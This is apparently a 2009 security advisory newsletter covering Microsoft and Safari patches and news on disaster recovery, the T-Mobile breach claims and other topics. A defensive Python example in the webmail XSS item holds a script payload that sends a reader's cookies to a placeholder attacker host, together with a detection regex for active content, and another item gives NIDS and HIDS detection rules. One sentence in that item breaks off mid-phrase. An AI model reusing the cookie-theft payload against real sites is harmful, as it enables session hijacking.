Advisory #267 - Microsoft (Multiple), Safari, Multiple News
Sûnnet Beskerming Alert List Advisory #267
You are receiving this message because you have subscribed to our Information Security Alert Mailing List, or have been selected for a specific one-off copy. If you believe that you are receiving this message in error, please contact info@... to resolve the error.

Why not upgrade to get same day notification on security threats? Details and rates available online - (http://www.beskerming.com/premium/generic_advisory.html). Why not go the next step and get delivery tailored just for your company? (http://www.beskerming.com/premium/focussed_advisory.html)

Once you've had a chance to read through this advisory, come back and answer the following question. Did you like the timeliness of the advisory? Our premium subscribers get this sort of service on every advisory - same day coverage of security discoveries and full details on all external tracking data that we have discovered, to help keep you informed and form a well-rounded opinion and assessment of the risk to you, your systems, and your data.

Contents
--------------------------------------------------------------------
1. SECURITY
--------------------------------------------------------------------
1.1 Microsoft (Multiple) - Remote Hacker Automatic Control - Time Since Discovery - 2 Days
1.2 Safari (Multiple) - Remote Hacker Automatic Control - Time Since Discovery - 2 Days

=======================================
/*
- Remote or Local - Can it be achieved through a network or does it require physical access?
- Hacker - The bad guy
- Manual or Automatic - Does the vulnerability need to be manually performed, or can it be automated?
- Control, Denial of Service or Data Theft - Will the hacker get control of your system / website, will they prevent you from using it, or will they steal data?
*/
--------------------------------------------------------------------
2. NEWS
--------------------------------------------------------------------
2.1 Dealing With Disasters - Not Being Afraid of a Sick Pig
2.2 Pace Moves to Suppress Reverse Engineering Discussion
2.3 Challenging Security Researchers and Coming off Second-Best
2.4 Claims of T-Mobile Hack Raise More Questions Than Answers
2.5 T-Mobile Responds to Hack Claims - Nothing to See, Please Move On
2.6 Critique of Apple's Security Stance Nothing New - But Still Worthwhile
2.7 Microsoft Money Joins Encarta on the Scrapheap

=====================================
1. SECURITY

1.1 Microsoft (Multiple) - Remote Hacker Automatic Control

-- Products Affected --
Windows
Office
Internet Explorer
IIS
Word

-- Technical Description --
MS09-018 - Windows. Remote code execution and denial of service. Replaces MS08-060 and MS08-035. Critical
MS09-019 - Internet Explorer cumulative update. Multiple remote code execution vulnerabilities. Replaces MS08-014. Critical
MS09-020 - IIS. Privilege escalation. Important
MS09-021 - Office. Multiple remote code execution vulnerabilities. Replaces MS09-009, MS08-057, MS08-074. Critical
MS09-022 - Windows. Remote code execution and others. Replaces MS07-021. Critical
MS09-023 - Windows Search. Information disclosure. Moderate
MS09-024 - Works converters. Code execution. Replaces MS08-072. Critical
MS09-025 - Windows Kernel. Multiple privilege escalation. Replaces MS09-006. Important
MS09-026 - Windows. Remote code execution. Replaces MS07-058. Important
MS09-027 - Word. Multiple remote code execution vulnerabilities. Replaces MS08-072. Critical

-- Description --
Microsoft has released ten patches for June, along with the remaining updates for MS09-017 (effectively making it eleven patches). The patches include several critical updates for Windows, a cumulative update for Internet Explorer, and a patch for a recently disclosed IIS privilege escalation vulnerability. Six patches were rated as Critical, three as Important, and the final patch as Moderate.
-- Recommended Action --
All users and administrators should apply the updates at the earliest opportunity.

-- Source --
http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx
http://www.beskerming.com/services/176/Patch_Briefing
http://store.eSellerate.net/s.asp?s=STR3448907936&Cmd=CATALOG&CategoryID=9811

-- Updates Available --
http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-019.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-020.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-021.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-022.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-023.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-024.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-025.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms09-027.mspx

-- External Tracking Data --
Upgrade to get details

-- Threat Matrix --
             U    O
Home User   10   10 (Highly Critical)
Corporate   10   10 (Highly Critical)

1.2 Safari - Remote Hacker Automatic Control

-- Products Affected --
Safari 3.x
Safari 4.0 Beta

-- Technical Description --
CFNetwork - Multiple vulnerabilities leading to code execution or information disclosure.
CoreGraphics - Multiple vulnerabilities leading to code execution.
ImageIO - PNG handling flaw leading to arbitrary code execution and denial of service.
International Components for Unicode - XSS due to poor filtering of Unicode.
libxml - Multiple vulnerabilities leading to code execution.
Safari - Possible information disclosure due to poor handling of privacy related material, and possible code execution.
WebKit - Multiple vulnerabilities, leading to remote code execution in the worst case.
-- Description --
Apple have released version 4 of their web browser, Safari, addressing numerous serious vulnerabilities across both OS X and Windows platforms. Due to the critical nature of the vulnerabilities patched, it is considered extremely important that the update is applied at the earliest possible opportunity.

-- Recommended Action --
All users and administrators should apply the updates at the earliest opportunity.

-- Source --
http://support.apple.com/kb/HT1222

-- Updates Available --
http://www.apple.com/support/downloads/

-- External Tracking Data --
Upgrade to get details

-- Threat Matrix --
             U    O
Home User   10   10 (Highly Critical)
Corporate   10   10 (Highly Critical)

=======================================
/*
Threat Matrix:
U - User
O - Operator
Harmless - 0 ----- 10 - Highly Critical
*/
=======================================

2. NEWS

2.1 Dealing With Disasters - Not Being Afraid of a Sick Pig

A holistic approach to Information Security takes into consideration more than just electronic assets and elements. Social engineers, for example, rely upon exploiting people to gain access to what they are after. Another non-electronic element is Disaster Recovery and all of the associated crisis management that comes with it.

Winter is less than a week away for countries in the Southern Hemisphere, and along with the cold weather comes cold and flu season. Every year companies are placed under strain as whole sections of their workforce fall ill or are forced to take time off work to care for family members who are ill. This can lead to real losses of efficiency and productivity, but it is next to impossible to actually predict who is more likely to become ill, and what areas of business are going to suffer the most. This year swine flu has seen more people than ever concerned about the slightest sniffle and cough and, so far, it hasn't affected large numbers worldwide to differentiate it significantly from normal influenza.
Widespread publicity and government action to help mitigate the spread from affected individuals has many hoping that it is nothing more than a scare, and will not be the next Spanish Influenza (which was also a swine flu originating from the Americas). The low percentages of people infected, compared to the overall population, seem to support this argument. With the ability for an infectious person to travel around the globe before symptoms present, the slow spread of swine flu is further reinforcement for those hoping that it is not going to be a significant problem. That has been the case up to now.

With the flu season getting into full swing in the Southern Hemisphere, the doubling of swine flu cases overnight in Australia might be enough to give people some pause. Even though the total number of infected people is less than 150 (at the time of writing), the scare amongst some people is that this could be the first real sign of an exponential growth in the numbers of infected people. Others are less concerned.

Whether the rate of growth is exponential or linear doesn't really matter; a range of actions is going on in the community that is going to force businesses to begin looking at maintaining operations on reduced staffing levels. Various schools have been closed (and some are now reopening), there are people and families all over the country entering into a 'stay-at-home' isolation, and there is the chance that passengers on a cruise ship in Australian waters will all be placed into isolation.

If you or your workplace don't have a Disaster Recovery plan in place, then now would be a good time to look at making one. The biggest problem that this flu season presents, even if swine flu is no worse than a normal flu, is in dragging away a significant percentage of employees for a week to two weeks at a time, even if they are completely healthy. Can your business continue to operate with 10%, 20%, 30% of employees away from work?
Are there any localised points of vulnerability where the loss of one or two key individuals will bring productivity to a halt? Can your business survive on limited or no turnover if all productivity is ceased? Can your healthy employees at home still carry out work remotely? If so, how secure is the interconnect with the workplace? Are you going to risk the security of your data and business to continue operations because you can't otherwise afford the productivity loss? The answers to questions such as these should form the core of your Disaster Recovery plan.

Once the plan is established, you should review it regularly to ensure the recovery actions and assessed risks are still relevant. The start of flu season is as good a time as any to do so.

A doubling of confirmed swine flu cases in 24 hours is significant, even with small overall numbers of infected individuals. The world will now be watching Australia to see what could be to come for the major population centres in the Northern Hemisphere when winter next rolls around.

If it were possible to accurately predict and plan for events taking place, then there would be no need for Disaster Recovery planning, but being prepared for disastrous events and having a plan to recover from them means that you and your business will survive with more resilience once normal operations are resumed (and they will be resumed more quickly). Get some benefit from the increased public awareness of swine flu and take the opportunity to get your Disaster Recovery plans sorted out before you actually need to implement them.

2.2 Pace Moves to Suppress Reverse Engineering Discussion

As a follow on to our post about McAfee pulling content before it could be read by many, here is a case where a company has taken steps to unpublish third party information that has already been published.
The Reverse Engineering Mac OS X site was running a series of entries on reverse engineering / decompiling Pace protected OS X binaries, only now the entries have been pulled pending threat of litigation from Pace. All that had been published to that point were exploratory posts probing possible entry points to bypass the Pace binary obfuscation and protection and recover the binaries to a point where they could be explored more readily from a better understood point of view. Efforts from Pace (specifically the InterLok application) to prevent the attaching of debuggers only drew the reverse engineers in further, taunting them with a disassembly they couldn't easily accomplish.

This time around, the RSS feed of the Reverse Engineering Mac OS X site didn't provide the full posted content, so it seemed that the content posted up to that point had been lost for good; it was unlikely that it would have been replicated across other sites to any significant extent. Since the content had been online for a couple of weeks, webcrawlers had been able to index the posts and their full content is still residing in various search engine caches across the Internet.

As the site's operator, fG!, points out: "One thing is certain, you can't accomplish security by obscurity! You can't simply stop knowledge because these days information flows at a bigger rate than ever. Disclosure is the only way to improve products!", with the following caution for those trying to reproduce the cached but missing entries: "About Pace? I'm in contact with their lawyer and I have been asked to remove all information about this. If you have mirrored the three Pace posts and code (I'm pretty sure I'm not the only one who mirrors important info right away) please do not make it publicly available. Pace will wave you with DMCA and it's not worth the trouble. Keep it for yourself, please".
Is there enough interest in reverse engineering OS X to generate a Streisand Effect, or will Pace be successful in seeing this information banished from the wider Internet?

2.3 Challenging Security Researchers and Coming off Second-Best

Challenging the security community to do something that you are basing a core part of your business on is always a risky move. It is something that you really need to get right the first time, or else it is going to be quite an embarrassing experience and is likely to cost reputation if news of the defeat is widespread.

A new webmail provider, which has based a core component of their service offering around offering "The most secure email accounts on the planet", might have to reconsider both their claims and their approach after a $10,000 USD challenge to break into a specified email account was defeated through a series of web based

With a big push of PR highlighting this challenge, it isn't going to go down well that the breach took place so quickly. Even if there were restrictive rules in place as to how the attack might be carried out, this isn't going to stop anyone who is attacking for real from using whatever means are at their disposal to access their victim's accounts.

From the description of the attacks carried out, the weakness is in how the user credentials and authentication are managed once the user has logged into the system (based on the described requirement for the attacker to launch it from a valid account), and it relies upon the user having scripting permitted for the attack to work (from an IDG writeup, it seems that NoScript is enough to prevent the attack from being functional). This and other Cross Site Scripting flaws allow for credentials to be stolen, and for a victim's account to be taken over completely. One of the researchers involved with the successful compromise of the targeted account has indicated that detailed information about the attack methodology will be released early next week.
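The attack chain described above (script delivered from one valid account, executing inside another user's logged-in webmail session, and the session being taken over through it) can be shown with a small server-side model. This is an added example written for this advisory, not code from the webmail provider or from the researchers involved; the function and field names, the hostile message and the placeholder collection host are all constructed. It puts the vulnerable rendering beside the hardened one, and shows the cookie attribute that keeps the session token out of reach of script, which is the server-side counterpart to the NoScript mitigation mentioned above.

```python
"""Stored XSS in a webmail client: vulnerable rendering beside the hardened
form. Added example for this advisory; not the webmail provider's code.
All names, the message and the collection host are constructed."""
import html
import re

# Constructed hostile message, as an attacker's own (valid) account would send it.
# The script posts the reader's cookies to a placeholder host (attacker.invalid
# is a reserved, non-resolving name, used here only for illustration).
HOSTILE_MESSAGE = {
    "from": "attacker@example.test",
    "subject": "Re: your account",
    "body": 'Hi! <script>new Image().src="https://attacker.invalid/c?"'
            '+encodeURIComponent(document.cookie)</script>',
}


def render_message_unsafe(msg):
    """Vulnerable: untrusted message fields are spliced straight into the page."""
    return (f'<div class="mail"><b>{msg["from"]}</b>: {msg["subject"]}'
            f'<p>{msg["body"]}</p></div>')


def render_message_safe(msg):
    """Hardened: every untrusted field is HTML-escaped before it reaches the
    page, so the browser treats it as text rather than markup."""
    e = html.escape  # escapes & < > and both quote characters
    return (f'<div class="mail"><b>{e(msg["from"])}</b>: {e(msg["subject"])}'
            f'<p>{e(msg["body"])}</p></div>')


# Markup that would execute or load attacker-controlled code if left unescaped.
ACTIVE_CONTENT = re.compile(
    r"<\s*(script|iframe|object|embed)\b|\son[a-z]+\s*=|javascript:", re.I)


def contains_active_content(rendered):
    """True if the rendered HTML still carries script-capable markup."""
    return ACTIVE_CONTENT.search(rendered) is not None


def session_cookie_header(session_id, hardened):
    """Value for the Set-Cookie header that carries the login session.
    HttpOnly hides the cookie from document.cookie even if some XSS gets
    through; Secure and SameSite limit where the browser will send it."""
    attrs = [f"sid={session_id}", "Path=/"]
    if hardened:
        attrs += ["HttpOnly", "Secure", "SameSite=Lax"]
    return "; ".join(attrs)


def session_theft_succeeds(render, cookie_header):
    """Both links of the chain must hold: the script runs in the victim's
    page, and the script can read the session cookie."""
    script_runs = contains_active_content(render(HOSTILE_MESSAGE))
    cookie_readable = "HttpOnly" not in cookie_header.split("; ")
    return script_runs and cookie_readable


if __name__ == "__main__":
    for name, render in (("unsafe", render_message_unsafe),
                         ("safe", render_message_safe)):
        for hardened in (False, True):
            hdr = session_cookie_header("s3cr3t", hardened)
            outcome = "succeeds" if session_theft_succeeds(render, hdr) else "fails"
            print(f"{name:6} render, hardened cookie={hardened!s:5}: theft {outcome}")
```

Output encoding is the control that actually removes the flaw; the cookie attributes only stop the session token leaving the page, and script that is still running can act as the user from inside the session without ever reading the cookie. Note also that nothing in this chain touches the login step, which is why a second factor delivered to a phone at login offers no protection against it.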
Depending on the nature of the attack, this could pose problems for other service providers that rely upon physically separate channels for two-factor authentication, particularly in the case where messages sent to cell phones are used as the second authentication factor (as it is with this email provider and a number of banks which use it as a selling point of the security of their services).

2.4 Claims of T-Mobile Hack Raise More Questions Than Answers

Claims have been made by an unknown party that they have compromised the US cellular network carrier T-Mobile and have managed to extract all of the corporate data, including databases, confidential documents, scripts and programs from company servers and full financial data up to the present time.

Issuing the public announcement over a weekend means that it is going to take some time for T-Mobile to investigate the claims and make a formal statement, but already there are elements which suggest scam, and some which suggest that the material is legitimate.

Leaning towards scam is the claimed ignorance by T-Mobile's competitors when they were approached with the data the hackers claim to have. This might just be that the hackers relied upon emails to reach the competitors, and with the email address pwnmobile@... they were likely to end up in the spam bin before anyone would be able to see the material on offer. There are better ways to reach people than through unsolicited email, but there are increased risks with taking this approach. Previous cases where there have been attempts to sell company secrets, especially for major public companies, have ended with major law enforcement attention and the approached company often aiding law enforcement in stopping the attempt.
With greater corporate and public awareness of data loss and theft, it is more likely in the modern environment that competitors will call law enforcement and gain positive PR than risk prosecution and damages by purchasing their competitor's secrets.

Leaning towards legitimacy are anonymous online comments from people claiming to have worked for T-Mobile in the past verifying that at least some of the details posted correlate with the systems and servers that they knew existed within the company. The other aspect which suggests legitimacy is the level of detail in the material posted, which amounts to a tabulated network description.

So far, based on the table of possible servers, applications, IPs and locations, there is nothing that can be done to further verify the accuracy of the claims by this unknown group. Not enough information is available to say either way, and it is now up to T-Mobile or the group to release further information that will clarify the situation. The arguments for an actual compromise are much weaker than the arguments for it not being real, and it is considered much more likely that it is a hoax.

It doesn't matter which one is actually true at the moment. The very public offer for sale of the material is going to cause more harm than good for the group behind it. For the seventh largest telecommunications provider in the world (Morgan Stanley, 2008), with 32 million customers in the US alone, T-Mobile is a very large target to be taking on, and the use of an anonymising email service may not be as secure as the group thinks it is, with Safe-mail keeping their client data protected up to the point it is necessary to comply with legal requirements, something that is probably going to happen soon.
It is staggering to think how much data is represented by what the hackers have claimed and how long it must have taken to exfiltrate that information from the corporate networks, if the hackers do have it, all without the awareness of T-Mobile's Information Security staff. Other claims have been made that the group responsible is the same one that claimed to have penetrated Check Point, extracting the full source code for VPN-1. At the end of the day it could just be another bit of drama played out on the Full-Disclosure mailing list, but it could also be the first public sign of one of the most significant network breaches in recent history.

2.5 T-Mobile Responds to Hack Claims - Nothing to See, Please Move On

Following on from our recent article on a claimed successful attack against the telecommunications giant T-Mobile, it appears that the situation still remains a little murky, with reports claiming that the company has both confirmed and denied that a breach took place.

Ignoring for a moment the most recent statements by T-Mobile, the original claim of a hack seemed to offer tabulated internal network data as proof of successful compromise of the company. This is the sort of information that would be easy to extract in a single file, and is something that would be expected to exist in any non-trivial network to aid administrators with keeping the network and associated systems operating smoothly. While having possession of the file reduces the need for an attacker to manually map out the network, it isn't something that many would consider overly damaging, especially if network and system security was robust.
Perhaps if a company had thrown all their intrusion detection eggs into the basket of Network Intrusion Detection Systems over Host Intrusion Detection Systems (NIDS vs HIDS), then possession of this list would allow an attacker to immediately commence extremely targeted attacks against single systems, hoping to avoid triggering the NIDS (which should have triggered on the external access in the first place); a properly managed HIDS should still trigger on those attacks. The flip side is that having an attacker in possession of a well-enumerated network map makes it simpler for them to target systems which might have an unpatched vulnerability, or which have a degraded HIDS, where their own network mapping activity would have triggered a properly managed NIDS.

A blended approach, with both systems in place and properly managed, isn't going to be overly threatened by an attacker having possession of a network map. All it means is that the timeline between initial contact with the network / company systems and compromise / extraction of sensitive data is compressed, reducing the available opportunity to detect, trap and stop the hack and data extraction.

T-Mobile's statements seem to support this point of view, acknowledging that the information published did exist in a file (again there are conflicting reports about the validity of this statement), which has now been identified, and that an investigation is now ongoing to determine the extent and severity of any breach that took place. The downside for external observers is that T-Mobile are not obliged to make public the results of their internal investigation, and if it is confirmed that personal data was affected for customers, then it could take some time for that information to come out. If affected customers are notified individually, it may never be known just how significant any breach might have been.
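The point about a network map compressing the attack timeline, and about why network-side and host-side detection cover each other, can be shown with two minimal rules run over constructed flow records. This is an added example for this advisory, not T-Mobile's code or any product's; the addresses, ports, thresholds, the per-host baseline and the traffic are all constructed. A blind attacker has to sweep the network and trips the NIDS-style scan rule; an attacker holding the map makes one connection to the one host it names, stays under that rule, and is caught only by the host-side rule that needs no volume.

```python
"""Network-side scan detection versus host-side new-peer detection, run over
constructed flow records. Added example for this advisory; not T-Mobile's
code or anyone's product. Addresses, ports, thresholds and the baseline
are illustrative."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed flow record format: "<ISO timestamp> <src> -> <dst>:<port>"
FLOW_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+)$")

SCAN_WINDOW = timedelta(seconds=60)
SCAN_THRESHOLD = 10          # distinct (dst, port) targets from one source
SENSITIVE_PORTS = {22, 445, 1433, 3389}


def parse_flow(line):
    m = FLOW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable flow record: {line!r}")
    ts, src, dst, port = m.groups()
    return datetime.fromisoformat(ts), src, dst, int(port)


def nids_scan_alerts(lines, window=SCAN_WINDOW, threshold=SCAN_THRESHOLD):
    """NIDS-style rule: a source that touches `threshold` distinct targets
    inside `window` is mapping the network. Returns the offending sources."""
    recent = defaultdict(deque)     # src -> deque of (ts, (dst, port))
    alerts = set()
    for ts, src, dst, port in map(parse_flow, lines):
        q = recent[src]
        q.append((ts, (dst, port)))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len({target for _, target in q}) >= threshold:
            alerts.add(src)
    return alerts


def hids_new_peer_alerts(lines, baseline):
    """HIDS-style rule, evaluated per host: an inbound connection to a
    sensitive port from a source outside that host's baseline of known peers.
    One connection is enough; no volume is needed."""
    alerts = []
    for ts, src, dst, port in map(parse_flow, lines):
        if port in SENSITIVE_PORTS and src not in baseline.get(dst, set()):
            alerts.append((dst, src, port))
    return alerts


# Constructed traffic. The blind attacker sweeps SMB across sixteen hosts in
# sixteen seconds; the attacker holding the leaked network map goes straight
# to the one host the map lists as unpatched, with a single connection.
BLIND_SWEEP = [f"2009-06-08T10:00:{i:02d} 10.9.9.9 -> 10.1.0.{i + 1}:445"
               for i in range(16)]
MAPPED_ATTACK = ["2009-06-08T11:00:00 10.9.9.10 -> 10.1.0.7:445"]

# Constructed per-host baseline: which sources normally reach each host's
# sensitive ports (here, only the admin jump host reaches 10.1.0.7).
BASELINE = {"10.1.0.7": {"10.1.0.2"}}


def compare():
    """Which detector fires for which attacker."""
    return {
        "blind": {"nids": bool(nids_scan_alerts(BLIND_SWEEP)),
                  "hids": bool(hids_new_peer_alerts(BLIND_SWEEP, BASELINE))},
        "mapped": {"nids": bool(nids_scan_alerts(MAPPED_ATTACK)),
                   "hids": bool(hids_new_peer_alerts(MAPPED_ATTACK, BASELINE))},
    }


if __name__ == "__main__":
    for attacker, hits in compare().items():
        print(f"{attacker:6}: NIDS {'fires' if hits['nids'] else 'silent'}, "
              f"HIDS {'fires' if hits['hids'] else 'silent'}")
```

The host-side rule depends entirely on the baseline being maintained, which is the "properly managed" qualifier above in concrete form: a stale baseline on a degraded host is exactly the gap the map lets an attacker aim for.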
Truth, as it is in many cases like this, will lie somewhere between the extremes being put forward (no or minimal hack versus full network access and compromise), but it is more likely to lie towards a minor network penetration and data extraction; after all, the information that was published had to come from somewhere. It is entirely possible that the information was the result of improperly disposed of hardware or a lost storage device. At the least, it put some excitement back into the old Full-Disclosure mailing list.

A big welcome, by the way, to those reading this article from within T-Mobile's network. Yes, we know you're there. If you, or any of our readers, would like to get in touch with us, we're always happy to discuss analysis and material beyond what is published.

2.6 Critique of Apple's Security Stance Nothing New - But Still Worthwhile

Apple is a company that is notoriously secretive about their internal security processes and, although they have become more open about acknowledging the source of bugs reported to them when they fix them, they remain steadfastly tight-lipped at almost all other times when it comes to discussing security matters. That isn't to say that the company doesn't keep on top of what is going on in the world outside of Apple, nor engage with researchers and Information Security companies. Despite this, many still hold the impression that Apple is stand-offish and uncaring / oblivious to the bugs in their products. For some, this point of view has tainted all dealings with the company and has seen some researchers publicly disclose vulnerability information before notifying Apple, whereas other vendors in the same situation would have been notified ahead of a co-ordinated or a delayed public release of vulnerability data.

Articles such as this one do little to help commonly held views, especially when they are picked up and reported as Apple struggling with security, even if that isn't the complete message of the original article.
Rich Mogull puts forward a reasoned, well-thought out series of arguments in the original article, but it is nothing new. Nothing that hasn't already been put forward to Apple, both publicly and privately, many times before. This doesn't mean that making these arguments is worthless. It's not. As Adobe has recently shown (and Microsoft some years before that), it is possible for a large software company to change how it approaches Information Security management, patch issuing, and dealing with security-concerned consumers and Information Security researchers. Even if Apple do not change their stance based on the most recent hirings and articles published by concerned Information Security and Apple system users, continuing to highlight and publicise the importance of taking these recommended steps keeps the ideas out in the open and being turned over, ready for a time when they might be more warmly received within Apple.

2.7 Microsoft Money Joins Encarta on the Scrapheap

Following their decision earlier this year to cut Encarta from their product line, Microsoft have announced that they will be ceasing production and sale of Microsoft Money (now Microsoft Money Plus) from June 30 this year. Affected products are all of the Microsoft Money family (Essentials, Plus Deluxe, Plus Premium, Plus Home & Business). Citing increasing competition from banks, brokerage firms, and websites as viable options for traditional Money customers, Microsoft stopped providing annual updates last year, and will stop all online services by January 31, 2011.

Reading deeper into the linked FAQ, it clearly states that Microsoft Money products cannot be activated or reactivated after January 31, 2011. This means that after that date, if the system running Microsoft Money is replaced, or the software is otherwise transferred to a new system, it will not and cannot be activated.
End users purchasing the software between now and the end of the month need to be aware that the effective life of their software could be eighteen months, and that they need to have alternate plans for handling their financial data after that date. If the system running Microsoft Money continues to operate happily beyond that point, the loss of online functionality can be largely replaced by manual updates of tax and stock quote data, but this does limit the effectiveness of the product.

=======================================

Sincerely,

Sûnnet Beskerming Team
info@...

Sûnnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com
Tel: +61 (0) 410 707 444

** Sûnnet Beskerming Pty. Ltd. **
Established in mid 2004, Sûnnet Beskerming Pty. Ltd. is the sister company to Jongsma & Jongsma Pty. Ltd., and was formed to develop and commercialise the research coming out of Jongsma & Jongsma Pty. Ltd. Sûnnet Beskerming Pty. Ltd. is an Information Security specialist and, in conjunction with the tools developed by Jongsma & Jongsma Pty. Ltd., provides total security solutions and services, from the perimeter to internal data stores, including web application security and security testing and analysis.

_______________________________________________
Alertmailinglist mailing list
Alertmailinglist@...
http://skiifwrald.com/mailman/listinfo/alertmailinglist_skiifwrald.com